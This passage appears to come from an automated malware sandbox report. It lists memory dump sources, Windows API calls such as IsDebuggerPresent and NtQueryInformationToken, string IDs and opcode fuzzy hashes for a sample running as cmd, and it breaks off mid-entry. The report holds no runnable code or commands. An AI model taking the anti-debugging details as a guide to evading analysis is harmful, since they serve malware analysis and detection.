• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtQueryInformationToken.NTDLL ref: 00D764E9
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: InformationQueryToken
• String ID:
• API String ID: 4239771691-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00D82FDD), ref: 00D82E5D
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: DebuggerPresent
• String ID:
• API String ID: 1347740429-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtSetInformationFile.NTDLL(000000FF,?,?,00000001,0000000D), ref: 00D8A14E
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: FileInformation
• String ID:
• API String ID: 4253254148-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00016E70), ref: 00D76EC5
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: #%u
• API String ID: 0-232158463
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: BinaryHash
• API String ID: 0-2202222882
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                        • Opcode ID: 5e24f45574864520be1e3e6e74eaf438f7831581447ce6cc9b05558fe37d2576
                                                                                        • Instruction ID: 7eb73be2d0c5e9774957719f71515a36d836412436dd8ac724c8a6f148a9e9ab
                                                                                        • Opcode Fuzzy Hash: 5e24f45574864520be1e3e6e74eaf438f7831581447ce6cc9b05558fe37d2576
                                                                                        • Instruction Fuzzy Hash: A242C6B5A006259FCB14CF59C8916ADF7B6FF8A318F1885EDD452AB340DB34E842CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a14547d206a87d596f5366f3ee9a808521c3ace67458c5224264beb43da9c12f
                                                                                        • Instruction ID: a496ef812c57f25354ddc7dfca071edc2ee9142ff04ff572adac171f4fc13b88
                                                                                        • Opcode Fuzzy Hash: a14547d206a87d596f5366f3ee9a808521c3ace67458c5224264beb43da9c12f
                                                                                        • Instruction Fuzzy Hash: 4D326D75E002199BCF14DFA8D890BAEBBB5FF84718F1801B9E805AB390E775D911CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 51937b51cef4d791c0aef06e5ec1abb29d308790132cd8fa70c8c62bf857f6db
                                                                                        • Instruction ID: 29736ff909ba792cb1cc85f1555fa8252b145a932cb3b64ae22da9cdbb7c721f
                                                                                        • Opcode Fuzzy Hash: 51937b51cef4d791c0aef06e5ec1abb29d308790132cd8fa70c8c62bf857f6db
                                                                                        • Instruction Fuzzy Hash: 46229035A04A168FCB59CF5CC490AAAF7B6FF88318F1885B9D855DB384DB34E941CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ca82b135b1f89aa6b022a400fed5b0a97b594e2157feac5122918a5b3caa2e58
                                                                                        • Instruction ID: 8f135777d671bf402d524c04adbdf7e2428bfce4bc0cac2e8312c8bf30c98027
                                                                                        • Opcode Fuzzy Hash: ca82b135b1f89aa6b022a400fed5b0a97b594e2157feac5122918a5b3caa2e58
                                                                                        • Instruction Fuzzy Hash: 0DD1D875A0032A9BCB14DF64C880BBEB7B9FF45718F08416EE816DB284EB38E945C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f99afaa3a5ad2ffb4897e9b63cfe1ae998cd6ccf8bfee137c3232421fe7d464
                                                                                        • Instruction ID: ef27731605cbbb206e03c63817deb856646052f1ef1649b8951b9190816d0880
                                                                                        • Opcode Fuzzy Hash: 7f99afaa3a5ad2ffb4897e9b63cfe1ae998cd6ccf8bfee137c3232421fe7d464
                                                                                        • Instruction Fuzzy Hash: B3C19275A003159FDB28CB59C840BAEF7B5EF44318F1C82AEE819AB280D775E951CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66b85d09176262a0fc504a13fddfdb63f8e1c17a2b2aae86a66345163e6b80f8
                                                                                        • Instruction ID: c54b6ce560a2b788150b28967527aa7e70538a30fba7b14c0b637a9dc747ac75
                                                                                        • Opcode Fuzzy Hash: 66b85d09176262a0fc504a13fddfdb63f8e1c17a2b2aae86a66345163e6b80f8
                                                                                        • Instruction Fuzzy Hash: 3AC12371A056248FCB28CF98C5907B9B7B5FF88708F1941ABFA429F395E7748A41C760
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15d19c595fe5715f090153ba1e1e39b6c2e36eb23dac81811e6701f730e3039f
                                                                                        • Instruction ID: 4eba9550e39c18c98786035b47703b81d691ec1bb4dd3393537a297d49c706c6
                                                                                        • Opcode Fuzzy Hash: 15d19c595fe5715f090153ba1e1e39b6c2e36eb23dac81811e6701f730e3039f
                                                                                        • Instruction Fuzzy Hash: A5C154B9D013099FCB15DFA9D950BAEBBF4FB48704F14446AE51AAB390E734A901CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 24c52f3b0829dc8f417ba1ff055bb73d4844851089c97ce89adc4e60f4586dbd
                                                                                        • Instruction ID: 2d4b446aed9e44b40cc083cc665bfc4bf89011fe24770eddfaed4e5301db22fe
                                                                                        • Opcode Fuzzy Hash: 24c52f3b0829dc8f417ba1ff055bb73d4844851089c97ce89adc4e60f4586dbd
                                                                                        • Instruction Fuzzy Hash: DFC169756083408FD760CF18C494BABB7E8FF88708F4449AEE5998B291D778E944CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d45625029a05a5c93e333ab702550644152472c21bf51b2ef7cc477374ec8f97
                                                                                        • Instruction ID: 4374d64e9591786768f42f66cd1c0e1aac9f5167571b887756d54c17dd108684
                                                                                        • Opcode Fuzzy Hash: d45625029a05a5c93e333ab702550644152472c21bf51b2ef7cc477374ec8f97
                                                                                        • Instruction Fuzzy Hash: 1CB18074A002658BDB34DF65C990BA9B3F5EF44714F4485EAD50BEB280EB709E85CF20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b41cdca54254fd6a710345f49348e300aac63948bc6db27f8686d86b3b8964a1
                                                                                        • Instruction ID: c8cc6356044ab7c65e05571ab1be62f5dd1d3079243975c130caf3d82ed66fdd
                                                                                        • Opcode Fuzzy Hash: b41cdca54254fd6a710345f49348e300aac63948bc6db27f8686d86b3b8964a1
                                                                                        • Instruction Fuzzy Hash: 5BA1D574B01726DFDB24EF65C590BAABBB5FF44318F0442B9E909DB281DB34A911CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 84b44c2b1cb1f0f4e092574abf744428cf1f76b27d213865cfee29371eb61f79
                                                                                        • Instruction ID: a88500291f0ced510d1ca4e74d5dc0aedd9c55b0c1e96eef31ef24bed76504bd
                                                                                        • Opcode Fuzzy Hash: 84b44c2b1cb1f0f4e092574abf744428cf1f76b27d213865cfee29371eb61f79
                                                                                        • Instruction Fuzzy Hash: FCA1EF72A04601AFC711DF55CA80BAAB7F8FF48308F4809B9F5859B752DBB4E911CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c230f782d9f02e33043171b9beffcc937c338a6a62041e53c09d7680fc7caf63
                                                                                        • Instruction ID: 8aff7145684ef73de2872e87bb5449f981e7c092027d3432ec42e09f1fd06244
                                                                                        • Opcode Fuzzy Hash: c230f782d9f02e33043171b9beffcc937c338a6a62041e53c09d7680fc7caf63
                                                                                        • Instruction Fuzzy Hash: 2B911339A00A149FDB20DFA8C584F7EB7B1EF94759F0941BAFA059B3A0E7349901C791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3031a114bd1dca20ec937c95993bfebf8369c5f4b03c565135041f50bdda8769
                                                                                        • Instruction ID: 4b34449d2944730ff0a89ce41096905a2d28c98d2a513117035ec2e6d867d710
                                                                                        • Opcode Fuzzy Hash: 3031a114bd1dca20ec937c95993bfebf8369c5f4b03c565135041f50bdda8769
                                                                                        • Instruction Fuzzy Hash: 97B17E75900306CFCB24DF19D5907AAB7B4FB18318F1849AFD8299F2A5DB39D842CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f44f407158f1268f6274a48997c2880f9b7d2c0ab3e07c7dccd39ecda937ba8e
                                                                                        • Instruction ID: 3c0eb0427842d44bf43f2660020a9f822f78f35021afdb60a482bfb2fdf9d1f3
                                                                                        • Opcode Fuzzy Hash: f44f407158f1268f6274a48997c2880f9b7d2c0ab3e07c7dccd39ecda937ba8e
                                                                                        • Instruction Fuzzy Hash: BDB10175A093909FD754CF28C580A6AFBF1FB89308F1849AEF8998B351D371E945CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72c72e1796cc372e71b659d4d5c9426461f8905e0b308b78a690f7129c9f1f59
                                                                                        • Instruction ID: 341434901f2400568bdb61ad1e10b650ea2d86d0c45c410a0251215307950e6b
                                                                                        • Opcode Fuzzy Hash: 72c72e1796cc372e71b659d4d5c9426461f8905e0b308b78a690f7129c9f1f59
                                                                                        • Instruction Fuzzy Hash: 4BA15975608342CFC714DF28C580A2ABBF9FF88344F1449AEE5959B350E771E945CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                        • Instruction ID: 9320fbb08786d0137f12e3ecc2c98ea1ad0f138a3665388b8f5043c926babbd6
                                                                                        • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                        • Instruction Fuzzy Hash: 8771A135A0421A9BEF24CF55E480ABFF7B9EF49648F5941FBD801AB240E774DA41C790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ad4a909cd9dcd96989a1fef22c35d60a6992763067c5ae187e099474d50384b
                                                                                        • Instruction ID: 383468f680f79e6620a6d615af52cf94136792dd4c28a8cb75b13dbfa475266a
                                                                                        • Opcode Fuzzy Hash: 4ad4a909cd9dcd96989a1fef22c35d60a6992763067c5ae187e099474d50384b
                                                                                        • Instruction Fuzzy Hash: 75816D71A00609AFDB11CFA4C890BEAF7F9FF48358F544479E956A7210DB30E955CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d6909fb23c2c30054591136c4cc8ef0765f83425a358bd273bc7da7ee5ab597
                                                                                        • Instruction ID: ed2ea7b89151d45263b265703507bf79ddc7d948b89b71eca5d6581f7c3434df
                                                                                        • Opcode Fuzzy Hash: 5d6909fb23c2c30054591136c4cc8ef0765f83425a358bd273bc7da7ee5ab597
                                                                                        • Instruction Fuzzy Hash: B3515775A08341DFC724DF29C190A2ABBF9FF88704F1449AEE5999B354E731E844CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c966e8599edb1f83f2d1dcdeee9cca9b8ff7dcb854e357aedc67d103c6a1cf99
                                                                                        • Instruction ID: 4f9929137c9d673df281b9fb733877a966d6c9cbc984b0c16f144c3ae4328740
                                                                                        • Opcode Fuzzy Hash: c966e8599edb1f83f2d1dcdeee9cca9b8ff7dcb854e357aedc67d103c6a1cf99
                                                                                        • Instruction Fuzzy Hash: BC4106356407009FCB25EF59D950B1ABBA9EF45724F1A447FF50A9BA90E7B0D801CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: def26aba191706e2d44002c8723f33c4b502c49f4e7e40122a930180287ed504
                                                                                        • Instruction ID: 000bc57fac95c10293b0efd26dee9b8763f3c5309304636ccb77730c9f44ded4
                                                                                        • Opcode Fuzzy Hash: def26aba191706e2d44002c8723f33c4b502c49f4e7e40122a930180287ed504
                                                                                        • Instruction Fuzzy Hash: E8515E35200604DFCB21EFA4C990E6AB7F9FB44748F4408BAEA56DB6A0D730E951CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e6a6ab628ffa14c4b7f5ca7f142a245c96249f9723bf465bc4e3aaf461c51ab8
                                                                                        • Instruction ID: fe33d27cf224bb14331369102adae2b8a0412de7c9c20135cc667bcf16795662
